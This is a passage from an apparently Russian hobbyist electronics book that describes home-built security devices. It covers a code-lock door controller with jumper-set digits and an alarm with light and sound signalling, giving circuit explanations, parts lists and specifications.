Выпрямитель собран на четырех диодах VD1—VD4 малой мощности, средний прямой ток которых не менее 1 А, а импульсное прямое напряжение — не менее 600 В. В качестве выпрямителя может быть применен блок или сборка диодов, выполненных в единой конструкции, например КЦ402А. Основным преимуществом данного выпрямителя по сравнению с другими схемами является большая частота пульсации, что позволяет уменьшить емкость конденсатора фильтра и габариты сетевого трансформатора. Преимущество мостовой схемы в том, что вторичная обмотка трансформатора питания имеет вдвое меньшее число витков, чем при двухфазной схеме, хотя для двухфазной схемы понадобится только два диода. Однофазный выпрямитель по мостовой схеме из всех вариантов двухполупериодных выпрямителей обладает наилучшими технико-экономическими показателями. Режим работы выпрямителя определяется в основном типом фильтра, включенного на его выходе. Емкостные фильтры применяются в выпрямителях, рассчитанных на малые токи нагрузки.

Конденсатор фильтра включается параллельно нагрузке для уменьшения пульсации выпрямленного напряжения. Реакция нагрузки на выпрямитель зависит от емкости конденсатора, сопротивление которого для переменной составляющей много меньше сопротивления нагрузки.

Напряжение постоянного тока, сглаженное емкостным фильтром, подается на простейший стабилизатор напряжения, собранный на транзисторе VT1 и стабилитроне VD5. Стабилизатор напряжения автоматически поддерживает постоянство напряжения на нагрузке с заданной точностью. Транзисторный стабилизатор напряжения содержит параметрический стабилизатор,

собранный на кремниевом стабилитроне и регулирующий транзистор средней мощности. Применение мощного транзистора позволяет получить гораздо больший выходной ток, чем только от параметрического стабилизатора с таким же стабилитроном.

Следует заметить, что примененный стабилизатор напряжения, отличаясь предельной простотой, обладает существенным недостатком: даже при кратковременном коротком замыкании в нагрузке регулирующий транзистор выходит из строя. По этой причине, а также учитывая низкое значение коэффициента стабилизации и относительно большое выходное сопротивление, в схеме можно применить стабилизатор с двумя транзисторами и защитой от перегрузок.

Стабилизаторы напряжения постоянного тока с двумя транзисторами различной структуры, приведенные на рис. 2.19, имеют примерно на порядок более высокие значения коэффициента стабилизации и на порядок меньше значения выходного сопротивления, чем стабилизатор, примененный в схеме на рис. 2.16. И одновременно стабилизаторы, изображенные на рис. 2.17, можно сделать нечувствительными к коротким замыканиям и перегрузкам, добавив диод и резистор, обозначенные на схемах штриховыми линиями.

Рекомендованную замену схемы стабилизатора напряжения могут выполнить более опытные радиолюбители. При этом транзистор VT1 можно монтировать на радиаторе охлаждения без изоляционных прокладок, если в стабилизаторе по схеме на рис. 2.19, а, с корпусом устройства соединен положительный полюс стабилизированного напряжения, а в устройстве по схеме на рис. 2.19, б,— отрицательный полюс. Например, использован стабилитрон Д814В (Д810) и применены транзисторы VT1 типа П214, VT2 — МП38А (рис. 2.19, а) или транзисторы VT1 — П702, VT2 — МП40 (рис. 2.19, б);

R1 — МЛТ-0,25-560 Ом.

В данном устройстве в качестве ИМ может быть использован электромагнит или соленоид, показанный на рис. 2.12. Обмотка содержит 4000 витков провода марки ПЭВ-2 диаметром 0,41 мм. Подвижной сердечник соленоида должен свободно перемещаться в катушке.

Кодозадающее устройство с дешифратором включает в свой состав четыре триггера, собранных на элементах микросхемы DA1.1 с выводами 1, 2 и 3; DA1.2 с выводами

2-152.jpg

Рис. 2.19. Принципиальные схемы стабилизаторов напряжения:

а — на транзисторах р-n-р-структуры: б — на транзисторах n-р-n-структуры.

4, 5 и 6; DA2.1 с выводами 1, 2 и 3; DA2.2 с выводами 4, 5 и 6; DA3 с выводами 1, 2 и 3; DA3.2 с выводами 4, 5 и'б; DA4.1 с выводами 1, 2 и 3; DA4.2 с выводами 3, 4 и 5; четыре элемента совпадения, собранные на DA1.4 с выводами 11, 12 и 13; DA2.4 с выводами 11, 12 и 13;

DA3.3 с выводами 8, 9 и К); DA4.3 с выводами 8, 9 и 10; дешифратор, который содержит девять переключателей S3—S11; кодозадающий узел, собранный на электрических соединителях Х2—Х27; транзисторный ключ на тринисторе VS1 и транзисторе VT2.

Контакты переключателя S2, устанавливаемого на охраняемом объекте в исходном состоянии устройства при закрытой двери, разомкнуты. В этом положении на всех четырех выводах триггеров (вывод 6) действует высокий уровень логической единицы, а на базе транзистора

VT2 будет напряжение низкого уровня; транзисторный ключ закрыт, электромагнит и индикаторная лампа H1 находятся в обесточенном состоянии.

Для работы охранного устройства применяется пятизначный шифр, который набирается с помощью установления перемычек между контактами соединителей Х2—Х27, но управление осуществляется только тремя кнопками, две из которых нажимают дважды. Первая цифра кода, например 2, получается при соединении элементов следующей электрической цепи: вывод 1 ИМС DA1, контакт электрического соединителя Х21, перемычка, контакт соединителя Х20, контакт соединителя Х4, перемычка, контакт соединителя Х5, кнопочный переключатель S4.

Следует заметить, что кнопочные переключатели S3—S11 устанавливаются на металлической плате, изготовленной из стального листа (полосы) толщиной не менее 4 мм, она закрепляется на входной двери охраняемого объекта. Все выведенные на лицевую панель кнопки обозначаются цифрами кода с 1 до 9. Около переключателя S3 необходимо нанести цифру 1, около S4 — цифру 2, около S5 — цифру 3 и т. д. Данная часть сторожевого устройства образует дешифратор, который имеет постоянное обозначение кнопок.

Если потребуется установить первую цифру кода, например 5, то необходимо образовать цепочку: вывод 1 ИМС DA1, X2I, Х20, Х10, X11, S7.

Вторая цифра кода устанавливается электрической цепочкой, состоящей из элементов: выводы 9 н 10 ИМС DA1, контакты Х23, Х22, Х2, ХЗ, S3. Эта цепочка определила вторую цифру кода — 1.

Третья цифра кода устанавливается набором электрической цепочки, состоящей из элементов: выводы 9 и 10 ИМС DA2, контакты соединителей Х23, Х22, Х16, Х15, кнопочный переключатель S10. Данная электрическая цепь позволяет набирать цифру кода 8.

Таким образом, образовав эти электрические цепи, набрано три цифры кода 218, а полный код состоит из пяти цифр. В данном устройстве к этим трем цифрам добавляются еще две цифры, уже участвующие в наборе кода, например 18, и весь код будет 21818. При дешифровании необходимо нажимать последовательно кнопки переключателей S4, S3, S10, S3, S10.

Работает охранное устройство следующим образом. После нажатия на первую кнопку, соответствующую первой цифре установленного кода, срабатывает первый триггер, переключаясь из одного крайнего состояния в другое. Напомним, что первый триггер собран на элементах ИМС DA1 (выводы: 1, 2 и 3; 4, 5 и 6). При этом напряжение высокого уровня логической единицы с вывода 3 поступает на вывод 12 элемента совпадения ИМС. DА1 (выводы 11, 12 и 13). При нажатии на кнопку S3, соответствующую следующей цифре кода, на второй вход этого элемента совпадения (вывод 13) будет подано напряжение высокого уровня логической единицы, а на выходе будет действовать низкий уровень логического нуля (вывод 11). Это состояние будет также на входе второго триггера (DA2 — выводы 1, 2 и 3; 4, 5 и 6), которое приводит к его срабатыванию, и с выхода этого триггера напряжение высокого уровня логической единицы поступает на вход следующего элемента совпадения (вывод 12 ИМС DA2). Если далее нажимать на кнопки и набирать правильный код аналогично сказанному, срабатывают элементы ИМС DA3. Сначала переключается триггер на элементах DA3.1 и DA3.2, затем через элемент совпадения (DA3.1) переключается триггер, собранный на элементах ИМС DA4 (выводы 1, 2 и 3; 4, 5 и б). На этом этапе набора цифр заканчивается первый этап работы дешифратора, который подготавливает устройство к набору пятой цифры кода.

Последовательный цикл набора ном.еров кода приводит к переключению всех четырех триггеров на один из входов элемента совпадения ИМС DA4 (вывод 11), на котором начинает действовать высокий уровень логической единицы. Такой же высокий уровень напряжения воздействует и на второй вход этого элемента (вывод 10) через резистор R4. Поэтому при наборе пятой цифры кода 8, когда на третьем входе элемента совпадения ИМС DA4 (вывод 9) также появляется напряжение высокого уровня логической единицы, на выходе этого элемента (вывод 8) будет действовать низкий уровень логического нуля. Этот уровень будет действовать также на входе инвертора, собранного на элементе ИМС DA3 (выводы 11, 12 и 13).

Инвертор, как простейшее устройство на микросхеме, преобразует сигнал низкого уровня на входе (выводы 12 и 13 ИМС DA3) в сигнал высокого уровня логической единицы и наоборот. Таким образом, на выводе 8 ИМС DA3 действует напряжение низкого уровня логического нуля. Благодаря инвертору (элемент DA3 с выводами 11, 12, 13) на базу транзистора VT2 приходит уже напряжение высокого уровня логической единицы. Это состояние приводит к открыванию транзистора VT2 и тринистора VS1. Через обмотку ЭМ1 и индикаторную лампу /// начинает протекать ток. Электромагнит срабатывает и открывает стопор защелки или оттягивает задвижку механического замка. Одновременно загорается лампа накаливания, которая подсвечивает надпись "входите".

Теперь рассмотрим вариант с неправильным набором шифра. Если в процессе набора кода нажата кнопка с цифрой, не входящей в него, то вторые входы всех ИМС DA1— DA4 (выводы 5) — входы всех четырех триггеров соединяются с общим проводом и триггеры возвращаются в исходное состояние. После этого код необходимо набирать заново. Триггеры всегда возвращаются в исходное состояние при открывании двери, так как контакты кнопочного переключателя S2 также соединены с общим проводом, который смонтирован с теми же входами триггеров.

В схему включена цепочка из резистора R3 и конденсатора С5, которая обеспечивает защиту от ложных срабатываний триггеров и ИМ. При любом появлении напряжения питания на конденсаторе С5 и зарядке его до номинального значения питания все триггеры возвращаются в исходное состояние.

При изготовлении охранного устройства, при его сборке, монтаже и регулировке использованы следующие комплектующие ЭРЭ: сетевой понижающий трансформатор питания Т1 броневой конструкции (покупной или самодельный) типа ТПП242-127/220-50; транзисторы VT1 типа КТ807Б, VT2 — МП38А; выпрямительные диоды VD1-VD4 типа Д242Б; стабилитрон VD5 типа КС156А; ИМС DA1 типа К155ЛАЗ, DA2 — К155ЛАЗ, DA3 — К155ЛАЗ, DA4 — К155ЛА4; резисторы R1 типа МЛТ-2-390 кОм, R2 — МЛТ-0,5-270 Ом, R3 — МЛТ-0,25-1 кОм, R4 — МЛТ-0,25-10 кОм, R5 — МЛТ-0,25-1 кОм, R6 — МЛТ-0,25-1 кОм, R7 — МЛТ-0,5-330 Ом; конденсаторы С1 типа МБМ-11-750В-0.05 мкФ, С2 — МБМ-11-750В-0.05 мкФ, СЗ — К50-6-16В-100 мкФ, С4 — К50-6-10В-200 мкФ, С5 — К50-6-6В-10 мкФ, С6 — К50-6-6В-10 мкФ; электрические соединители X1 типа «вилка» с электрическим кабелем в двойной изоляции; Х2—Х27 типа КМЗ-1 приборные; переключатели S1 двухпозиционный типа П2Т-1-1, S2 — самодельной конструкции, S3—S11 типа КМ1-1; плавкие предохранители F1 и F2

типа IIM-1-2 А; индикаторная лампа Н2 типа ТН-03-1;электромагнит ЭМ1 (или соленоид самодельной конструкции); тринистор VS1 типа КУ202Н.

Правильно собранное устройство, без ошибок в монтаже и из заведомо исправных комплектующих ЭРЭ, начинает работать сразу же после включения и сеть.

При сборке и ремонте охранного устройств могут быть внесены некоторые изменения в схему и заменены комплектующие ЭРЭ. Например, вместо резисторов МЛТ можно применить резисторы типов ОМЛТ, МТ, ВС, С1-4, С2-8, УДИ, БЛП; вместо конденсаторов К50-6 можно использовать конденсаторы типов К.50-3, К.50-12, К50-16, К50-20; комплект выпрямительных диодов VD1—VD4 типа Д242Б можно заменить диодными сборками типов КЦ402А, КЦ402Е или применить менее мощные выпрямительные диоды.

Конструктивно охранное устройство выполняется в виде отдельных сборочных единиц. С учетом органолентических показателей конструируется дешифратор, который укрепляется на входной двери. К этому блоку кроме эстетических предъявляются требования по устойчивости к механическим воздействиям. Дешифратор должен быть прочно укреплен на входной двери, обладать повышенной жесткостью конструкции и противостоять ударным нагрузкам.

Блок питания устройства вместе с логическими элементами изготавливается в пластмассовом или металлическом корпусе, размеры которого не превышают 140Х120Х70 мм. Элементы электроники собираются на печатной плате из фольгированного стеклотекстолита. БП устанавливается внутри охраняемого помещения в месте, которое позволяет легко обслуживать это устройство.

Основные электрические параметры и технические характеристики малогабаритного охранного устройства с дискретным управлением

Номинальное напряжение питающей сети неременного тока, В .................... .220

Номинальная частота питающей сети переменного тока, Гц ....................... .50

Номинальное стабилизированное напряжение

электропитания БЭ, В .................. .5

Коэффициент нелинейных искажений напряжения

питающей сети переменного тока, %, не более... 12

Пределы изменения напряжения питающей сети

переменного тока, В..................... 187... 242

Пределы изменения частоты питающей сети переменного тока, Гц...................... 49... 51

Пределы изменения постоянного напряжения питания БЭ, В ............ ............ .4,97...5,05

Коэффициент стабилизации, не менее .......... .70

Напряжение на выводах обмоток сетевого трансформатора питания Т1, В; под нагрузкой:

11 и 12 ............................ .2,47

13 и 14 .............. ............. .2,46

15 и 16 ............ ............ 5,0

17 и 18 .............. ............ .4,96

19 ч 20 .......................... 1,29

21 и 22 ............................ .1,28

Напряжение питания ИМ переменным током, В ... .220

Максимальная мощность, потребляемая устройством от сети переменного тока, Вт .......... .65

Количество одновременно охраняемых объектов, шт . . 1 Количество цифр в коде, шт ................ .5

Количество разрядов кодовой комбинации ....... .9

Ток, потребляемый устройством в режиме холостого хода, мА, не более .................. .25

Сопротивление изоляции токоведущих частей и элементов устройства относительно металлического корпуса и между собой, МОм, не менее ..... 10

Задержка времени срабатывания устройства при

неправильном наборе, мс ................. .0,5

Срок службы, ч, не менее .................. .5000

Вероятность безотказной работы устройства при риске заказчика в=0,9, не менее ............ .0,98

Условия эксплуатации:

температура окружающей среды, °С ........ .—25...+45

относительная влажность воздуха при температуре 25 °С, %, не более ............... .9о±3

атмосферное давление воздуха, мм рт. ст. .... .200...900

климатическое исполнение ............... . УХЛ

р31.jpg

Рис. 2.18. Принципиальная схема малогабаритного охранного устройства с дискретным управлением.

 

Рис. 2.18. Принципиальная схема малогабаритного охранного устройства с дискретным управлением.

Изображение: 

Рис. 2.19. Принципиальные схемы стабилизаторов напряжения:

Изображение: 

Таблица 2. 17. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в малогабаритном охранном устройств

Изображение: 

2.4. Электронное комбинированное устройство сигнализации

2. 4. ЭЛЕКТРОННОЕ КОМБИНИРОВАННОЕ УСТРОЙСТВО СИГНАЛИЗАЦИИ

Для изготовления в домашней мастерской и для практического использования предлагается к рассмотрению достаточно простое УС, содержащее всего одну ИМС и три транзистора. Монтаж, регулировка и настройка этого устройства доступны подготовленному радиолюбителю.

Электронное комбинированное сторожевое устройство со световой и звуковой сигнализацией предназначено для охраны жилых, производственных и хозяйственных помещений, а также транспортных средств от несанкционированного вторжения. Оно может быть установлено на дверях, окнах, форточках, люках, крышках, капотах и т. п. Простота конструктивного и схемно-технического решений электронного комбинированного УС делает его общедоступным для тиражирования в радиолюбительских лабораториях, цехах малых предприятий и мастерских юных техников. УС может быть применено для охраны объектов на садово-огородных участках. В данном устройстве применяются комплектующие изделия и элементы общего назначения, которые имеются в торговой сети, что значительно снижает стоимость его изготовления при серийном производстве. В целом охранное устройство имеет высокие технико-экономические показатели: например, в режиме холостого хода максимальный ток, который потребляет УС, не превышает 5 мА. УС работает от сети переменного тока напряжением 220 В частотой 50 Гц, а также и от аккумуляторной батареи напряжением 12 В.

Принципиальная электрическая схема устройства со световой и звуковой сигнализацией приведена на рис. 2. 3. Как следует из данной электрической схемы, УС включает в свой состав входное устройство, сетевой понижающий трансформатор питания Т1, выпрямительное устройство с емкостным фильтром, СИП, устройство электронной сигнализации комбинированного тока и выходные сторожевые цепи.

Входное устройство обеспечивает подключение к сети переменного тока напряжением 127 или 220 В, а также к аккумуляторной батарее GB1; предохраняет УС от коротких замыканий в первичных цепях, которые часто возникают при неправильной сборке или монтаже и из-за

некачественных комплектующих ЭРЭ; сигнализирует о готовности УС к эксплуатации. На входе установлен плавкий предохранитель F1,сигнальная лампа Н1 и однополюсные переключатели В1 и В4. Подключение к сети переменного тока осуществляется с помощью электрического соединителя X1 типа «вилка», смонтированного с электрическим кабелем, имеющим повышенное сопротивление изоляции. Длина кабеля колеблется в пределах от 1, 5 до 2, 3 м. Для переключения напряжения с 220 В на напряжение 127 В на входе устройства установлены два держателя предохранителя F1 (на схеме не указано), один из которых подключен к обмоткам выводов трансформатора 1 и 3, а второй — к выводам обмоток 2 и 3.

Сетевой понижающий трансформатор питания 77 изготавливается на магнитопроводе броневой конструкции типа ШЛ, Ш или УШ, имеет одну катушку с тремя обмотками, изолированными друг от друга лакотканью с повышенной электропрочностью. Катушка трансформатора устанавливается на центральном стержне магнитопровода, активная площадь поперечного сечения которого должна быть не менее 4, 5... 5 см2. Сетевой трансформатор питания обеспечивает расчетный уровень выпрямленного напряжения постоянного тока, полную гальваническую развязку вторичных цепей устройства от высокого напряжения переменного тока питающей сети, а также дополнительную электробезопасность при эксплуатации устройства, так как на вторичной обмотке трансформатора Т1 и элементах электронной схемы действует пониженное безопасное напряжение. Моточные данные самодельного сетевого понижающего трансформатора Т1 приведены в табл. 2. 6.

На выходных обмотках сетевого трансформатора Т1 в режиме холостого хода действуют переменные напряжения 6, 3 В (выводы 6 и 7) и 13, 5 В (выводы 4 и 5). Вместо самодельного трансформатора в данном УС можно применить готовый унифицированный трансформатор типов ТА, ТН, ТАН, ТПП, ТС, ТТ, например можно использовать трансформатор типа ТПП277-127/220-50.

К выводам вторичной обмотки б и 7 подключена сигнальная лампа H1 с напряжением питания 5... 6 В. К выводам 4 и 5 трансформатора подключено выпрямительное устройство, собранное по однофазной двухполупериодной мостовой схеме на четырех выпрямительных

Таблица 2. 6. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в комбинированном электронном сторожевом устройстве

2-41.jpg

диодах VD1 — VD4 и относящееся к выпрямителям нерегулируемого типа. Рассматриваемый выпрямитель, выполненный по схеме Греца, характеризуется рядом положительных и отрицательных параметров. К положительным параметрам выпрямительного устройства можно отнести повышенную частоту пульсации выпрямленного напряжения постоянного тока, более полное использование габаритной мощности трансформатора, сравнительно низкий уровень обратного напряжения на комплекте выпрямительных диодов, повышенную мощность, которую можно получить с этого выпрямителя. К недостаткам мостовой схемы относятся: значительное количество используемых выпрямительных диодов, сравнительно большая (по сравнению с другими схемами) стоимость изготовления выпрямителя, невозможность установки однотипных выпрямительных диодов на металлические радиаторы охлаждения без изоляционных прокладок, пониженное значение кпд и повышенные потери. Выпрямительные диоды в такой схеме имеют легкие условия эксплуатации, высокую надежность работы и повышенный срок службы. Работает выпрямитель Греца на емкостный фильтр, собранный на оксидных конденсаторах. Пульсации выпрямленного напряжения постоянного тока сглаживаются сначала фильтром на конденсаторах С1 и С2, а затем П-образпым фильтром, включающим в свои состав оксидные конденсаторы СЗ, С4 и резистор R2.

В схеме электронного комбинированного УС на выходе выпрямителя собран ПСН, составленный из стабилитрона VD5. балластного резистора R1 и усилителя тока, выполненного на транзисторе VT1. Стабилизатор напряжения обеспечивает на выходе постоянное стабилизированное напряжение 12В при токе нагрузки до 100 мЛ. Для увеличения мощности стабилизатора и тока нагрузки транзистор VT1 может быть заменен более мощным, например из серии К. Т608, П216.

В состав УС входят ИМС DA1, два маломощных транзистора VT3, VT2 и тиристор VD 10 (VS1). Включается устройство двумя электрическими переключателями B1 и В2. Первый выключатель подготавливает устройство к работе, о чем свидетельствует загорание сигнальной лампы H1. Выключатель В2, расположенный скрытно, включает собственно сигнальное устройство. При включении питания начинает заряжаться электролитический конденсатор С6 через резистор R4. Транзисторы в это время закрыты. ИМС, состоящая по существу из четырех полевых транзисторов с изолированным затвором, работает в ключевом режиме. При напряжении питания до 6 В эти ключи закрыты. Как только конденсатор С6 зарядится до напряжения 8 В и напряжение на затворах транзисторов микросхемы достигнет 4 В, на выводе 3 появится напряжение высокого уровня — напряжение питания. Следует заметить, что выводы 2 и 6 ИМС являются затворами полевых транзисторов, вывод 3 — истоком, 10 и 12 — стоками, 9 и 13 — затворами, 11 — изолированным затвором на общей подложке. ИМС DAI представляет собой четырехтранзисторный переключатель.

Конденсатор С6 заряжается до порогового напряжения примерно за 1, 5 мин, и за это время необходимо отключить замкнутый контакт, например дверь охраняемого объекта. Если на объекте установлено несколько скрытых выключателей, то указанное время отсчитывается от момента включения последнего переключателя. Регулировка времени срабатывания УС обеспечивается изменением номиналов электрической цепочки R4, С6.

На транзисторах VT2, VT3 собран мультивибратор, предназначенный для управления тиристором VD10 (VS1), в анодную цепь которого включают звуковой сигнализатор или несколько звуковых сигнализаторов. При включении электропитания переключателем В2 питание подается на мультивибратор. С этого момента вся система сигнализации находится в дежурном режиме работы, потребляя минимальный ток. Конденсаторы С7 и С8 пока не заряжены, а транзисторы VT2 и VT3 и тиристор VD10 (VS1) закрыты.

Переключатели S1 и S2 установлены так, что при открывании дверей или окон, где они установлены, их контакты замыкаются, и в это время вывод 9 микросхемы через электрическую цепочку R5, VD7 подключается к отрицательному полюсу источника питания. Если после открывания двери ее опять закрыть и тем самым снова замкнуть контакты кнопочного переключателя S1 или S2, конденсатор будет медленно разряжаться через резистор R4. Конденсатор С6 заряжается примерно за 2 мин, а разряжается за 1, 5 мин. После зарядки конденсатора С6 на выводе 8 ИМС DAI появляется полное напряжение питания, которое сохраняется до тех пор, пока напряжение на выводе 9 не станет меньше порогового значения. В течение 1, 5 мин тревожный сигнал будет продолжаться, хотя дверь уже закрыта.

В момент, когда на выводе 8 ИМС появляется полное напряжение, начинает заряжаться конденсатор С8 через резистор R12 и открывается транзистор VT2. Мультивибратор переходит в рабочий режим. В это же время на управляющий электрод тиристора VD10 (VSI) поступают через резистор R17 открывающие его импульсы с частотой примерно 0, 5 Гц и подаются прерывистые звуковые сигналы. Задержка времени от момента открывания двери до появления звукового сигнала равна 15... 18 с. За это время переключатель В2 переводится в положение «включено». Процесс восстановления режима сигнального устройства к повторному включению длится ориентировочно 1 мин.

При замыкании контактов S4, S5 световой и звуковой сигналы включаются практически мгновенно. При их замыкании через цепь R7, VD9 вывод 13 ИМС DAI подключается к отрицательному полюсу источника питания, появляется напряжение питания на выводе 14 ИМС и через резистор R13 заряжается конденсатор С8. В данном случае почти без задержки срабатывает мультивибратор. В это же время напряжение на конденсаторе С8 продолжает повышаться, что приводит к увеличению частоты Жуковых сигналов, которые затем сливаются в епрерывное гудение.

В УС применяются следующие комплектующие изделия и элементы: сетевой понижающий трансформатор питания Т1 броневой конструкции типа ШЛ; ИМС DA1 типа K1KТ682B; транзисторы VT1 тина КТ603Б, VT2 КТ315А, VT3 — KT361A; выпрямительные диоды VD1—VD4 типа КД105Б, VD6- VD9 — Д220;

стабилитрон VD5 тина Д814Д; тиристор VD10 (VS1) типа КУ202Н; конденсаторы С1 типа К50-3-50В-200 мкФ, С2 — К50-3-16В-100 мкФ, СЗ— К50-3-16В-200 мкФ, С4 — К50-3-16В-200мкФ, С5— К50-3-16В-10мкФ,С6— К50-3-16В-50 мкФ, С7 — К50-3-16В-20 мкФ, С8— К50-3-16В-10 мкФ, С9 — К50-3-16В-200 мкФ, С10— К10-7В-50В-Н30-3300 пФ, СИ— К50-3-25В-50 мкФ; резисторы R1 типа ВСа-0.5-470 Ом, R2 — ВСа-0,125-150 Ом, R3 — ВСа-0,125-30 кОм, R4 - ВСа-0,125-2,0 МОм, R5 — ВСа-0,125-30 кОм, R6 — ВСа-0,125-1,3 кОм, R7 — ВСа-0,125-1,3 кОм, R8— ВСа-0,125-2,0 МОм, R9 — ВСа-0,125-30 кОм, R10 ВСа-0,125-1,3 кОм, R11 — ВСа-0,125-30 кОм, R12 — ВСа-0,125-150 кОм, R13— ВСа-0,125-100 кОм, R14 — ВСа-0,125-240 кОм, R15 — ВСа-0,125-30 кОм, R16— ВСА-0,125-50 кОм, R17— ВСа-0,125-100 Ом, R18— ВСа-0,125-100 Ом, R19 — ВСа-2-240 кОм; электрический соединитель X1 типа «вилка» с электрическим кабелем длиной 1,5 м; плавкий предохранитель F1 типа ПМ-1-0,25 А; индикаторные лампы H1 типа МН-6,3-0,3 А, Н2—Н4— А-12; аккумуляторная батарея средней емкости GBI с номинальным напряжением постоянного тока 12 В; переключатели В1, ВЗ, В4 типа П2Т-1-1, 52, SI—S5 типа П2К; громкоговоритель ВА1 с сопротивлением обмотки около 4 Ом или телефонный капсюль динамического типа.

При монтаже, регулировке и -ремонте УС могут быть применены другие комплектующие изделия и ЭРЭ, не ухудшающие основные электрические параметры устройства и его эксплуатационные характеристики. Например, сетевой понижающий трансформатор питания T1 типа ТС-5-4 можно заменить самодельным трансформатором с характеристиками, указанными в табл. 2.6. Диоды типа КД105Б можно заменить на КД102, КД103, КД105, Д226; стабилитрон типа Д814Д — на Д813; транзистор типа КТ603Б — на КТ608, КТ815, ГТ404; тиристор типа КУ202Н — на КУ202А, КУ202Б; электролитические конденсаторы типа К50-3 — на К50-6, К50-12, К50-16, К50-20; резисторы типа ВСа — на МЛТ, МТ, ОМЛТ, ВС, УЛИ, Cl-4, C2-8.

При изготовлении устройства рекомендуется объединить БП и БЭ в единую конструкцию, выполненную в пластмассовом корпусе, на лицевой панели которого необходимо предусмотреть выводы для подключения шлейфа, внешнего автономного источника электропитания, блока громкоговорителей и датчиков, устанавливаемых на¦ входных дверях, окнах и т. д.

Монтаж всех элементов сторожевого устройства необходимо выполнять только при отключенном напряжении питания. Блоки, узлы и датчики устройства должны быть размещены в местах, защищенных от влаги, масла, ныли, высокой температуры, агрессивных паров различных жидкостей и обязательно в труднодоступных для посторонних лиц местах так, чтобы их нельзя было сразу обнаружить и вывести из строя.

Основные электрические параметры и технические характеристики электронного комбинированного сторожевого устройства

Номинальное напряжение питающей сети неременного тока, В ....................... .220 или 127

Номинальная частота питающей сети переменного тока, Гц ............................ .50

Номинальное напряжение автономного источника питания постоянного тока, В .............. .12

Пределы изменения напряжения питающей сети

переменного тока, В .................... .187...242

Пределы изменения частоты питающей сети переменного тока, Гц ..................... .49,5...50,5

Пределы изменения напряжения автономного источника питания, при которых обеспечивается устойчивая работа устройства, В .... .10...14

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .12

Выходное стабилизированное напряжение для электропитания блоков устройства и подзарядки аккумуляторной батареи, В .......... .12±0,05

Коэффициент стабилизации, не менее .......... .100

Амплитуда пульсаций стабилизированного напряжения постоянного тока, мВ, не более ........ .15

Ток, потребляемый устройством от сети переменного напряжения в режиме холостого хода, мА, не более .......................... 10

Ток, потребляемый от автономного источника питания, в режиме холостого хода, мА, не более . . .5

Максимальная мощность сторожевого устройства

при включенной сигнализации, Вт .......... .35...40

Сопротивление изоляции токоведущих частей устройства относительно друг друга и металлического корпуса, МОм, не менее .......... .5

Напряжение на выводах вторичных обмоток трансформатора 77, В:

5 и б ............................ .6

7 и 8............................. 13, 5

Помехозащищенность устройства при напряженности внешнего электромагнитного ноля, дБ, не менее............................. 80

Вероятность безотказной работы устройства при Р =0, 92, не менее............... 0,97

Срок службы, ч, не менее .................. 5000

кпд, %, не менее ........................85

t31.jpg

Рис. 2.3. Принципиальная схема комбинированного электронного устройства сигнализации.

Рис. 2.3. Принципиальная схема комбинированного электронного устройства сигнализации.

Изображение: 

Таблица 2. 6. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в комбинированном электронном сторож

Изображение: 

4. Глава третья. Электронные и электромеханические сторожевые устройства.

Глава третья. Электронные и электромеханические сторожевые устройства

3. 1. Общие сведения

3. 1. ОБЩИЕ СВЕДЕНИЯ

В настоящее время некоторые промышленные производства занимаются изготовлением и установкой всевозможных сторожевых устройств различного назначения и конструктивного исполнения. Количество таких устройств сравнительно невелико, хотя и они часто повторяют друг друга по конструктивно-техническим решениям и электронным схемам. Многие сторожевые устройства, к сожалению, отличаются невысокими показателями качества и надежности и легко поддаются дешифрованию. Применяемые в подобных устройствах электронные схемы характеризуются сравнительной простотой и небольшим набором комплектующих ЭРЭ. Следует заметить, что погоня за максимальным, часто неоправданным снижением себестоимости этих изделий и получением наибольшей прибыли, которую извлекают малые, плохо оснащенные предприятия, кооперативы и т. д., делают сторожевые устройства малопригодными для выполнения своих функций. Сегодня можно встретить устройства с одним и тем же наименованием, но предназначенные для выполнения разных функций.

Много специальных устройств создано для охраны подвижных средств. Они устанавливаются на автомобили обычно частными кооперативами и мелкими акционерными обществами, которые, как правило, не несут полной ответственности за надежность и долговечность их эксплуатации. Злоумышленники легко овладевают автомашинами, оснащенными противоугонными системами низкого качества. Необходимо знать, что большинство этих изделий очень чувствительны к качеству изготовления источников питания, перепадам напряжения питающей сети, частоте и стабилизации тока.

В торговой сети в последнее время появляется все больше и больше разнообразных автономных источников питания, которые используются в качестве резервного электропитания сторожевых устройств. Некоторые фирмы рекламируют компактные и простые в эксплуатации источники питания с широким диапазоном выходной мощности от 0, 1 до 500 Вт и более и повышенным сроком службы. Например, время автономной работы аккумуляторов типа UPS PS20 при различной нагрузке и номинальной температуре окружающей среды 25 °С приведено в табл 3. 1.

Сегодня рынок насыщен новыми сторожевыми устройствами как отечественного, гак и зарубежного производства, обеспечивающими необходимое сервисное обеспечение на основе микропроцессорного управления. Но эти системы, как правило, очень дорогие и не могут быть повторены даже в хорошо оснащенных радиолюбительских лабораториях. К новым сторожевым системам можно отнести электронные устройства, датчики которых устанавливаются в охраняемых помещениях, а сигнал о несанкционированном вторжении передается от электронного блока через обычную электрическую сеть на ЦПУ, где постоянно высвечивается информация о состоянии объекта. В случае проникновения на любой из охраняемых объектов на центральном пульте возникают световой и звуковой сигналы тревоги с указанием номера помещения.

Промышленные сторожевые устройства, предназначенные для охраны банков, квартир, территорий вокруг зданий, автостоянок, оснащаются радиоэлектронными передатчиками, бесконтактными детекторами разбивания стекла, магнитными контактами, активными инфракрасными детекторами, источниками бесперебойного питания и противопожарными системами большой емкости, в том числе и адресными.

Рассматривая некоторые конкретные типы сторожевых устройств, предлагаемых к использованию, по приведенным в рекламных проспектах сведениям, можно сделать неправильные выводы и принять неточные решения, так как ни одно из этих изделий не подтверждается схемами электронных устройств и на них нет необходимой КД. Как правило, в рекламных проспектах и паспортах сторожевых устройств кратко указывается их назначение, но подробно расписываются второстепенные преимущества и даются общие сведения по установке и обслуживанию. Например, при установке противоугонной системы типа «Викинг-604» со всех выводных и монтажных проводников снимаются и уничтожаются все маркировочные знаки и обозначения, не указываются технические характеристики ни на основных, ни на вспомогательных блоках и устройствах системы, чем обеспечивается невозможность демонтажа, ремонта и регулировки этого изделия вне мастерской, где оно было смонтировано. Подобный «сервис» делает хозяина автотранспорта полностью зависимым от фирмы, в которую он обратился.

